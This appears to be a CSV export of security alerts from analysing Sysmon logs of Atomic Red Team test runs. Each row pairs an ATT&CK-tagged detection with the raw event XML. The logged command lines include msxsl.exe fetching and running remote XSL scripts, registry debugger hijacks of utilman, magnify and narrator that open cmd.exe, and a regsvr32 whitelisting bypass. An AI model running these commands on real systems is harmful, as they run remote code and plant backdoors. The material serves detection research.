SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3761 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:53.038 + 747F3D96-D8CD-5D31-0000-001047543300 + 1852 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3760 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:52.989 + 747F3D96-D8CC-5D31-0000-001038513300 + 948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3759 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.067 + 747F3D96-D8CA-5D31-0000-0010CF443300 + 6268 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3758 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:50.029 + 747F3D96-D8CA-5D31-0000-0010DA413300 + 4004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 3757 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:50:20.871 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49727 + + false + 172.217.17.132 + ams15s30-in-f4.1e100.net + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3756 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.533 + 747F3D96-D8AB-5D31-0000-0010A4D53200 + 1888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3753 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:19.455 + 747F3D96-D8AB-5D31-0000-001054D03200 + 6244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3752 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:18.000 + 747F3D96-D8AA-5D31-0000-0010C0C93200 + 6016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3749 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:17.916 + 747F3D96-D8A9-5D31-0000-001072C43200 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3748 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.762 + 747F3D96-D8A6-5D31-0000-0010F9B13200 + 6664 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3745 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.649 + 747F3D96-D8A6-5D31-0000-001053A73200 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3744 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.173 + 747F3D96-D8A5-5D31-0000-0010C0A03200 + 6116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3741 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.096 + 747F3D96-D8A5-5D31-0000-0010729B3200 + 4212 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3740 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.306 + 747F3D96-D8A2-5D31-0000-0010D8943200 + 2484 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3737 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.253 + 747F3D96-D8A2-5D31-0000-00108A8F3200 + 6156 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3736 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.335 + 747F3D96-D89F-5D31-0000-0010BC823200 + 2404 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4046 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.938 + 747F3D96-D97A-5D31-0000-00102BE33800 + 4628 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 